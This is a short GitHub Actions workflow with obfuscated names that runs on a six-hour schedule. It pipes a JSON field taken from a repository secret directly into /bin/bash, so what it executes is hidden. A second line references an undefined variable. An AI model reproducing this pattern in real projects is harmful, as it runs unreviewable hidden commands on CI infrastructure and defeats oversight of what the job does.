name: fawumubiao
on:
  workflow_dispatch:
  schedule:
    - cron: '16 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fawumubiao
        env:
          fwpb11: ${{ secrets.fwpb11 }}
        run: |
          echo $fwpb11 | jq -r .vysev70293 | /bin/bash
          echo $oss68 | jq -r .ogla89910 | /bin/bash

